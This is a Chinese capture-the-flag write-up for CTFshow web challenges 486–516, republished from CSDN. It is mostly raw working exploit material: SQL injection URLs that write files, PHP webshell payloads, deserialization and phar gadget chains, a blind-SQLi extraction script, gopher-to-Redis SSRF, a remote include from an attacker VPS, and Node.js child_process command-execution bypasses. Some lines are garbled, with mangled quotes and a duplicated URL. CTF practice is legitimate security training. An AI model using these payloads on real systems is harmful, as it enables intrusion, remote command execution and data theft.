标签:php http .. show ctf CTFSHOW WP 8080 512
文章目录
- 前言
- web486
- web487
- web488
- web489
- web490
- web491
- web492
- web493
- web494
- web495
- web496
- web497
- web498
- web499
- web500
- web501
- web502
- web503
- web504
- web505
- web506
- web507
- web508
- web509
- web510
- web511
- web512
- web513
- web515
- web516
前言
前段时间写了个Web安全的Github仓库,大佬们帮忙点个小星星https://github.com/Stakcery/Web-Security
这篇wp主要以引导为主,拒绝无脑抄
web486
简简单单目录穿越
http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=…/flag
web487
首页adction能够读取代码,我读完了所有代码发现只有http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=…/index里面代码游泳
$username=$_GET['username'];
$password=$_GET['password'];
$sql = "select id from users where username = md5('$username') and password=md5('$password') order by id limit 1";
echo $sql;
$user=db::select_one($sql);
var_dump($user);
直接sql注入,因为web目录没有写入权限所以只能写tmp目录下读取
http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=…/…/…/…/…/…/…/tmp/y11
http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=check&username=123’) union select flag from flag into dumpfile “/tmp/y11.php”–+&password=123
web488
先?action=check&username=<?php eval($_POST[1]);?>&password=1
再访问/cache/cb5e100e5a9a3e7f6d1fd97512215282.php
具体原因不说自己研究
web489
和488基本上一样存在变量覆盖,因此可以自定义执行sql语句,实现任意登陆,再覆盖username为<?php eval($_POST[1]);?>
最后访问/cache/6a992d5529f459a44fee58c733255e86.php即可
web490
第一步
http://1e6526fd-3805-4ddd-bfca-5ba269c93212.chall.ctf.show:8080/index.php?action=clear
第二步
http://1e6526fd-3805-4ddd-bfca-5ba269c93212.chall.ctf.show:8080/index.php?action=check&username=0' union select "`cat /flag`"--+
第三步:
http://1e6526fd-3805-4ddd-bfca-5ba269c93212.chall.ctf.show:8080/cache/6a992d5529f459a44fee58c733255e86.php
web491
第一步
http://1e6526fd-3805-4ddd-bfca-5ba269c93212.chall.ctf.show:8080/index.php?action=clear
第二步
http://389af0f6-12b5-448f-8e75-8e3c5c172cd4.chall.ctf.show:8080/index.php?action=check&username=1' union select load_file("/flag") into dumpfile "/tmp/4.php"--+&password=1
第三步
http://389af0f6-12b5-448f-8e75-8e3c5c172cd4.chall.ctf.show:8080/index.php?action=../../../../../../../../tmp/4
web492
第一步:
http://7f02a14b-b18d-4f1b-8e8e-8d23955ff6cd.challenge.ctf.show:8080/index.php?action=check&username=;'123&user[username]=--><?php system("cat /flag");?><!--
第二步
http://7f02a14b-b18d-4f1b-8e8e-8d23955ff6cd.challenge.ctf.show:8080/cache/7f02a14b-b18d-4f1b-8e8e-8d23955ff6cd.challenge.ctf.show:8080/cache/6a992d5529f459a44fee58c733255e86.php
web493
通过读文件发现考点是反序列化,构造
<?php
class db{
public $log;
public $sql;
public function __construct(){
$this->log=new dbLog();
}
public function __destruct(){
$this->log->log($this->sql);
}
}
class dbLog{
public $sql;
public $content;
public $log;
public function __construct(){
$this->log='log/1.php';
$this->content = "<?php system('cat /flag');?>";
}
}
$a = new db();
echo urlencode(serialize($a));
web494
有点骚,和上一题一模一样不过在数据库里,没啥难度自己做
web495
username=1' union select "1",group_concat(flagisherebutyouneverknow) from flagyoudontknow%23
web496
import requests
import random
url = "http://6a42440e-0d5b-4a37-a3ec-3d237cf94f0f.challenge.ctf.show:8080/api/admin_edit.php"
i = 0
result = ""
while 1:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
user = "".join(random.sample('qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890', 6))
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# flagisherebutyouneverknow118 之后去http://6a42440e-0d5b-4a37-a3ec-3d237cf94f0f.challenge.ctf.show:8080/index.php?action=index
# post数据username=1' union select "1",group_concat(flagisherebutyouneverknow118) from flagyoudontknow76%23%23&password=1'即可
payload = "select group_concat(column_name) from information_schema.columns where table_name='flagyoudontknow76'"
data = {
"nickname": f"{user}",
"user[username]": f"21232f297a57a5a743894a0e4a801fc3' and (select ascii(substr(({payload}),{i},1)))>{mid}#"
}
headers = {
"cookie": "__cfduid=d995c7d9f402d7ee1e5573ecba5351ba71615771126; PHPSESSID=3ld0fehhsdfue824lco65i0k97"
}
r = requests.post(url, data=data, headers=headers)
if "成功" in r.json()['msg']:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web497
第一步:
http://68fa2d97-f636-4bc8-896d-7b3924312c21.challenge.ctf.show:8080/index.php?action=check
username=1' union select group_concat(username),group_concat(nickname),group_concat(avatar) from user%23
第二步:修改头像
file:///flag
web498
gopher协议打redis最后执行,百度搜索gopherus的使用
1=system(“cat /flag_bei_ni_fa_xian_le”);
web499
第一步
http://68fa2d97-f636-4bc8-896d-7b3924312c21.challenge.ctf.show:8080/index.php?action=check
username=1' union select group_concat(username),group_concat(nickname),group_concat(avatar) from user%23
第二步:
http://3a8e6454-e285-4137-95be-52a9377d49a8.challenge.ctf.show:8080/index.php?action=view&page=admin_settings
修改任意一项为<?php system($_GET[1]);?>
第三步:
http://3a8e6454-e285-4137-95be-52a9377d49a8.challenge.ctf.show:8080/config/settings.php?1=cat%20%20/flag_bei_ni_fa_xian_le
web500
首先老规矩登录
http://d637394f-6b04-420b-9152-c25ea72db54a.challenge.ctf.show:8080/index.php?action=check
username=1' union select group_concat(username),group_concat(nickname),group_concat(avatar) from user%23
多了个数据库备份功能,看到备份能想到的 要么是目录穿越读任意文件 要么就是后缀可控 能改个参数实现phpshell
刚好审计个人配置信息那里,发现个人头像的地址参数是不限制长度插入数据库的因此插入
头像地址改为
<?php system($_GET[1]);?>
之后访问
http://d637394f-6b04-420b-9152-c25ea72db54a.challenge.ctf.show:8080/index.php?action=view&page=admin_db_backup
点击备份,把名字改为1.php
最后
http://d637394f-6b04-420b-9152-c25ea72db54a.challenge.ctf.show:8080/backup/1.php?1=cat%20/flag_bei_ni_fa_xian_le
web501
首先老规矩登录
http://d637394f-6b04-420b-9152-c25ea72db54a.challenge.ctf.show:8080/index.php?action=check
username=1' union select group_concat(username),group_concat(nickname),group_concat(avatar) from user%23
admin_db_backup页面
if(preg_match('/^zip|tar|sql$/', $db_format)){
和上一题一样只需要格式为1.zip.php即可
web502
首先老规矩登录
http://d637394f-6b04-420b-9152-c25ea72db54a.challenge.ctf.show:8080/index.php?action=check
username=1' union select username,nickname,avatar from user%23
利用了shell_exec的一个小特性绕过
http://55b7e745-7140-4c7f-8065-00f0116137bf.challenge.ctf.show:8080/api/admin_db_backup.php
db_format=zip&pre=/var/www/html/cache/3.php;
http://55b7e745-7140-4c7f-8065-00f0116137bf.challenge.ctf.show:8080/cache/3.php?1=cat%20/flag_bei_ni_fa_xian_le
web503
在admin_upload.php存在文件上传,因为只能上传php,结合admin_db_backup.php有个file_exists得到应该是phar反序列化
<?php
class db{
public $log;
public $sql;
public function __construct(){
$this->log=new dbLog();
$this->sql = "<?php system($_GET[1]);?>"
}
public function __destruct(){
$this->log->log($this->sql);
}
}
class dbLog{
public $sql;
public $content;
public $log;
public function __construct(){
$this->log='log/1.php';
}
}
$a = new db();
$phar=new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
web504
覆盖
../../../../../../../../../../../../../../var/www/html/config/settings
内容为
O:2:"db":8:{s:2:"db";N;s:3:"log";O:5:"dbLog":3:{s:3:"sql";N;s:7:"content";N;s:3:"log";s:9:"log/1.php";}s:3:"sql";s:25:"<?php system($_GET[1]);?>";s:8:"username";s:4:"root";s:8:"password";s:4:"root";s:4:"port";s:4:"3306";s:4:"addr";s:9:"127.0.0.1";s:8:"database";s:7:"ctfshow";}
之后访问url/log/1.php?1=cat /flag_bei_ni_fa_xian_le
web505
上传new.sml内容user<?php system($_GET[1]);?>
http://8184adbc-44af-4034-ae26-48946d374def.challenge.ctf.show:8080/api/admin_file_view.php?1=cat /flag_is_here_aabbcc
post
f=/var/www/html/templates/new.sml&debug=1
web506
上传new.yy内容user<?php system($_GET[1]);?>
http://8184adbc-44af-4034-ae26-48946d374def.challenge.ctf.show:8080/api/admin_file_view.php?1=cat /flag_is_here_aabbcc
post
f=/var/www/html/templates/new.yy&debug=1
web507
http://6714dbd4-2c22-493e-827c-fd1872aefe06.challenge.ctf.show:8080/api/admin_file_view.php
post
debug=1&f=data://test/palin,user<?php+system("cat /flag_is_here_dota");
web508
http://74efad91-d13e-4da9-8c92-b94a44a08c2c.challenge.ctf.show:8080/api/admin_file_view.php?1=cat /flag_is_here_dota2
post数据
debug=1&f=../../../../../../../../../../../var/www/html/img/f3ccdd27d2000e3f9255a7e3e2c48800.jpg
web509
在系统配置的文件上传处,上传图片,内容为user<?=`$_GET[1]`;
之后访问http://b48fa450-ca3e-4fb8-a5f5-53f32d9c5a0c.challenge.ctf.show:8080/api/admin_file_view.php?1=cat /flag_is_here_lol
post数据
debug=1&f=../../../../../../../../var/www/html/img/f3ccdd27d2000e3f9255a7e3e2c48800.jpg
web510
刚好比较巧妙的是session目录开头就是user
第一步登陆,然后去个人资料设置那里修改头像内容为<?php system($_GET[1]);?>,因为avator属性不限制长度
第二步http://051847d1-1347-4670-b312-6df487623d9a.challenge.ctf.show:8080/api/admin_file_view.php?1=cat /f*
post数据,sess_后面的那串是你在cookie当中phpseesid的值
debug=1&f=../../../../../../../../../../tmp/sess_6kl7kq5mtlhj06sovlohpmmij7
web511
上传new.sml
123{{var:nickname}}
然后去个人资料修改显示昵称为cat /f*
之后访问http://c38a2bd3-a49b-4b93-af9b-1e64f5ba944c.challenge.ctf.show:8080/index.php?action=view&page=new
web512
web513
第一步,在新增模板处,新建两个模板
第一个为new.sml,内容为
http://your-vps/1.txt
在你的vps的1.txt中输入内容<?=cat /f*;
第二个为new5.sml,内容为
123{{cnzz}}
第二步,在系统配置处的页面统计处填写
/var/www/html/templates/new.sml
之后访问得到flag
http://a878d84d-51c0-4e64-866b-58b80096d5e5.challenge.ctf.show:8080/index.php?action=view&page=new5
web515
利用反引号与字符拼接
http://c6e0801d-412e-4363-bbb1-153227a88b4c.challenge.ctf.show:8080/signup
username=3&password=1)%2beval(eval(`ctxx.re`%2B`quest.qu`%2b`ery.z`)
http://c6e0801d-412e-4363-bbb1-153227a88b4c.challenge.ctf.show:8080/user/10?z=process.mainModule.require("child_process").execSync("echo $FLAG").toString()
web516
利用反引号
http://c6e0801d-412e-4363-bbb1-153227a88b4c.challenge.ctf.show:8080/signup
username=3&password=1)%2beval((`pro`%2b`cess`%2b`.mainModule`%2b`.req`%2b`uire("child_pro`%2b`cess").exe`%2b`cSync("echo $FLAG").toString()`)
http://c6e0801d-412e-4363-bbb1-153227a88b4c.challenge.ctf.show:8080/user/10
标签:php,http,..,show,ctf,CTFSHOW,WP,8080,512 来源: https://blog.csdn.net/solitudi/article/details/115739632
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。